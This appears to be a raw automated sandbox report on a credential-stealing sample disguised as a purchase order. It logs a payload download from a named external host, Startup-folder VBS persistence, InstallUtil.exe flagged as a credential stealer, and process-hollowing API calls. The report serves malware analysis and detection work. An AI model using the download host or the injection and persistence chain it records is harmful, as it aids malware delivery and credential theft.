Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
Accept-Ranges: bytes
Content-Length: 1260040
Connection: close
Content-Type: video/mp4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49753 | 209.58.149.225 | 443 | 1788 | C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 18:08:00 UTC | 220 | OUT | GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: www.chirreeirl.com
Connection: Keep-Alive
2025-01-09 18:08:00 UTC | 209 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 18:08:00 GMT
Server: Apache
Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
Accept-Ranges: bytes
Content-Length: 1260040
Connection: close
Content-Type: video/mp4


Target ID: 0
Start time: 13:07:37
Start date: 09/01/2025
Path: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe"
Imagebase: 0x4c0000
File size: 27'136 bytes
MD5 hash: 95BEC6594E293A42F4ABB049EA7E81DB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.69506645006.0000000006590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.69496394260.0000000003928000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 13:07:50
Start date: 09/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase: 0xac0000
File size: 42'064 bytes
MD5 hash: 5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 3
Start time: 13:07:59
Start date: 09/01/2025
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs"
Imagebase: 0x7ff6bcdf0000
File size: 170'496 bytes
MD5 hash: 0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:07:59
Start date: 09/01/2025
Path: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"
Imagebase: 0xab0000
File size: 27'136 bytes
MD5 hash: 95BEC6594E293A42F4ABB049EA7E81DB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.69719834098.0000000004883000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 68%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 5
Start time: 13:08:11
Start date: 09/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase: 0x1c0000
File size: 42'064 bytes
MD5 hash: 5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true


                                                                  Execution Graph

                                                                  Execution Coverage:10.8%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:4.1%
                                                                  Total number of Nodes:220
                                                                  Total number of Limit Nodes:6

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2
                                                                  • API String ID: 0-450215437
                                                                  • Opcode ID: 0456ab5dc6f0592c7895e646618f597bf1d8efd0f65ff7fde9435ef548007c1d
                                                                  • Instruction ID: 8063239b16f29fbae71e108dfb87d0f449f7d123d86dd14d9cf7b8a5e35b726c
                                                                  • Opcode Fuzzy Hash: 0456ab5dc6f0592c7895e646618f597bf1d8efd0f65ff7fde9435ef548007c1d
                                                                  • Instruction Fuzzy Hash: E9E2D574A056188FCB64EF68D894B9EBBF2FB89701F1081EAD509A7355DB309E85CF40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: b3c6e9e488a85cf7c71fcc4472b9011697b76fa1f008b3d0eb029dbb84b50601
                                                                  • Instruction ID: 434aecc16a02c7d00c90f35d1e673d906e5a04bab9edb60d4c15cf5c5843395a
                                                                  • Opcode Fuzzy Hash: b3c6e9e488a85cf7c71fcc4472b9011697b76fa1f008b3d0eb029dbb84b50601
                                                                  • Instruction Fuzzy Hash: 8EB2F434A00218CFDB55DFA8C894BAEB7B6BF88701F15819AE505AB3A5DB70ED41CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8
                                                                  • API String ID: 0-4194326291
                                                                  • Opcode ID: e2aaf77b8fc9a2dd3957bae860231ff026c1c2ca811665334c826f08d64714ae
                                                                  • Instruction ID: b961869182f98ae00fe1474a2434f904c8f9c5d6e3dde8c701de3a6af6197622
                                                                  • Opcode Fuzzy Hash: e2aaf77b8fc9a2dd3957bae860231ff026c1c2ca811665334c826f08d64714ae
                                                                  • Instruction Fuzzy Hash: A852D575E00629CFDB64DF69C850AD9B7B1FB99300F1086EAD909A7354DB706E85CF80

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: U
                                                                  • API String ID: 0-3372436214
                                                                  • Opcode ID: 1021fce7a6f621b0843a09e85588fd2f57c27a5627cd5097dcbf45a7539f5b2c
                                                                  • Instruction ID: 3ceaa62606b8c978914cc762866ebb83958e56a044ec051c40f6a966d358fac6
                                                                  • Opcode Fuzzy Hash: 1021fce7a6f621b0843a09e85588fd2f57c27a5627cd5097dcbf45a7539f5b2c
                                                                  • Instruction Fuzzy Hash: 7D325C30B00205CFDB55DF29C894A6AB7F6FF89726B1584AAE506CB361DB31EC41CB51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4
                                                                  • API String ID: 0-4088798008
                                                                  • Opcode ID: f18e5c9da29821e45fcd305df1dbabfa980db683a315b8ca56b4a80edaf3cda4
                                                                  • Instruction ID: 28f282746749b246c49aa85c6dfbf4d838ac8048cd540af62b1334944f1a1263
                                                                  • Opcode Fuzzy Hash: f18e5c9da29821e45fcd305df1dbabfa980db683a315b8ca56b4a80edaf3cda4
                                                                  • Instruction Fuzzy Hash: B722F734A00218CFDB65DFA4C994BADB7F2BF48701F1581AAE509AB3A5DB709D81CF50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1993 66a1c81-66a1d1e NtProtectVirtualMemory 1996 66a1d20-66a1d26 1993->1996 1997 66a1d27-66a1d4c 1993->1997 1996->1997
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 066A1D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: b67ebd33260766157fdf2b5b14f2ab77eedb892332827f26c38668b0cb98b596
                                                                  • Instruction ID: 6fcc5f5412879f141b818bb39e89e718e41521b869b5dd502c465fa8d2a75d7a
                                                                  • Opcode Fuzzy Hash: b67ebd33260766157fdf2b5b14f2ab77eedb892332827f26c38668b0cb98b596
                                                                  • Instruction Fuzzy Hash: 7C21EFB1D01349DFDB10DFAAD984AAEFBF5BF48310F20842AE519A7200C7749944CBA0
                                                                  APIs
                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 066A1D11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 2706961497-0
                                                                  • Opcode ID: 5300d4410c160884e9b3ac4b6397a1c372ede806909d12bf25890c7eaefca336
                                                                  • Instruction ID: 8ad54c5793161b605bb92b38dd0c87b175183cd409de10de240c890159321bb8
                                                                  • Opcode Fuzzy Hash: 5300d4410c160884e9b3ac4b6397a1c372ede806909d12bf25890c7eaefca336
                                                                  • Instruction Fuzzy Hash: FE21DFB1D01349DFDB10DFAAD884AAEFBF5FF48310F60842AE519A7240D775A944CBA4
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 066A4BA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 48b0fa0a4a749dce7cd03195f6c012461b34e9a2a795e2f169164fde1462d836
                                                                  • Instruction ID: aae4500ad98e814ad6de2fbec3364216b13b899598c9eef0758b3ad20783236e
                                                                  • Opcode Fuzzy Hash: 48b0fa0a4a749dce7cd03195f6c012461b34e9a2a795e2f169164fde1462d836
                                                                  • Instruction Fuzzy Hash: 741133B1D00309CEDB10DFAAC8847AFFBF4AF88320F50842EC519A7240D778A9458FA0
                                                                  APIs
                                                                  • NtResumeThread.NTDLL(?,?), ref: 066A4BA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 6ac8261c57e788ab043bed539ecd8d5482eebb04fcfa9747cf7a6b24b14ccd9d
                                                                  • Instruction ID: 49e7f3fcd14a13a04a9b40ac1953e5a46a7d142704701f803b8d8dfa2cf20110
                                                                  • Opcode Fuzzy Hash: 6ac8261c57e788ab043bed539ecd8d5482eebb04fcfa9747cf7a6b24b14ccd9d
                                                                  • Instruction Fuzzy Hash: 3F1117B1D003498FDB10DFAAD8847AEFBF4AF88210F54842ED519A7240D774A945CFA0

                                                                  Control-flow Graph

                                                                  [Graph not reproduced: executed / not-executed block view of a function that calls CreateProcessA]
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066A28C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: cbb615ce81e1ae64ce0790e2811334ceb63f272c6450fcc1017d8089af0be2f0
                                                                  • Instruction ID: 589fe2ba8267b63b24dc915ed67ea18fdc82e98ca659820234d4be88e065e224
                                                                  • Opcode Fuzzy Hash: cbb615ce81e1ae64ce0790e2811334ceb63f272c6450fcc1017d8089af0be2f0
                                                                  • Instruction Fuzzy Hash: 68814571D003499FDB50CFA9C8917EEBBF6BF48310F288529E855A7244D7749A85CF81

                                                                  Control-flow Graph

                                                                  [Graph not reproduced: executed / not-executed block view of a function that calls CreateProcessA]
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066A28C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0

                                                                  APIs
                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05837705
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile
                                                                  • String ID:
                                                                  • API String ID: 1304948518-0

                                                                  APIs
                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 05837705
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69503248413.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_5830000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFile
                                                                  • String ID:
                                                                  • API String ID: 1304948518-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505824122.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:

                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 066A3868
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0

                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 066A3868
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0

                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066A3F66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066A3F66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 066BD7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 0648037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 066BD7FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507450292.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66b0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066A455E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 0648037C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505733961.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6480000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066A455E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69507404578.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_66a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69484398217.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_e50000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: hoG
                                                                  • API String ID: 0-1022838359
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W
                                                                  • API String ID: 0-655174618
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: W
                                                                  • API String ID: 0-655174618
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0648135B
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0648135B
                                                                  • Instruction ID: 997900d65e020e0a226ff4b6c5188515a6e098f4399b007e08c5ba05b99ea75a
                                                                  • Opcode Fuzzy Hash: 99ce52832d53e06d2d9c04d5aa30ffcd5084d8e86ab90d2e47cd8f2545ccbfbf
                                                                  • Instruction Fuzzy Hash: 56712435A002058FCB11DF68C854A6BBBB9FF85312F1585AAE916DB381DB30E951CBD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69505824122.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64a0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c6a96648073cfe092bb77fa1c560eeaa5d0635d3e99e49ce3d1c7f458004d43
                                                                  • Instruction ID: 8f676eb5404a92f8f8ef9678e6dd8bb59eb94800fef348f539cfcb39d801141b
                                                                  • Opcode Fuzzy Hash: 0c6a96648073cfe092bb77fa1c560eeaa5d0635d3e99e49ce3d1c7f458004d43
                                                                  • Instruction Fuzzy Hash: 7C91E034E01208DFCB9ADFA9D4986EDBBB2BF49301F10906AD426B7355DB356882CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dedb3ed00a216f6106718ef3958da8648db293435f43f68fb1313d46db23d0f9
                                                                  • Instruction ID: e33b7f5f180682166c7c8e6aeac801dfd2e523db429fab15e10c217db6948c9b
                                                                  • Opcode Fuzzy Hash: dedb3ed00a216f6106718ef3958da8648db293435f43f68fb1313d46db23d0f9
                                                                  • Instruction Fuzzy Hash: 7D811935A00618CFDB55DFA8C48499EB7F5FF88311B1685AAE906DB360DB31ED42CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506566390.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6580000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7c996a22fb3303727fc7dc509a9940ce0a998d0e1b68ceb099b06612f746037a
                                                                  • Instruction ID: 65e599707238ba195f0cd3d20a2f5063cc870b21d0c729a821230330e7d4aa99
                                                                  • Opcode Fuzzy Hash: 7c996a22fb3303727fc7dc509a9940ce0a998d0e1b68ceb099b06612f746037a
                                                                  • Instruction Fuzzy Hash: 21810474D05218CFDBD4EFA9D8846EEBBB2FB88301F14852AD4067B654E7B05945CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69484398217.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_e50000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 753cec93bf02f5a8c28fe0c8c82159e40b698cea868d7a891190ae636994ac84
                                                                  • Instruction ID: a13305cde6f5074a1e9dc28df9cd6ac5324797bb87965d013dfb1e33ef5354c3
                                                                  • Opcode Fuzzy Hash: 753cec93bf02f5a8c28fe0c8c82159e40b698cea868d7a891190ae636994ac84
                                                                  • Instruction Fuzzy Hash: 71512630708244DFE315AB78D854F6A7BA1AFC2712F118CA6E546DF2A6DB309C0DCB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3e528f88eb5a2b8f4e97e630b0d3838b4f3f296902a72ac7ea71edf6ebd8718
                                                                  • Instruction ID: c70e4315ce66e85b968b9cfc0ed789af92003dac1c11d665f2ccd06c77dc9940
                                                                  • Opcode Fuzzy Hash: e3e528f88eb5a2b8f4e97e630b0d3838b4f3f296902a72ac7ea71edf6ebd8718
                                                                  • Instruction Fuzzy Hash: 2251AF30A012458FD759DFB988607AFBBF7EFC6300F14842AD6069B345EF75A90587A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_64e0000_PO-12202432_ACD_Group.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3bfb82083556b6cbf254ddf583e1e252d72018ea867b1de9cb814eca910a405c
                                                                  • Instruction ID: bc07e2e83b4301d70d0f040e9691d3d51a93c787d0ef7364703254dfd8643eea
                                                                  • Opcode Fuzzy Hash: 3bfb82083556b6cbf254ddf583e1e252d72018ea867b1de9cb814eca910a405c
                                                                  • Instruction Fuzzy Hash: 2F517A30B012048FD75AAF78C864A2E7BE7FF89601714446EE6068B3A5CF35ED06CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.69506261282.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
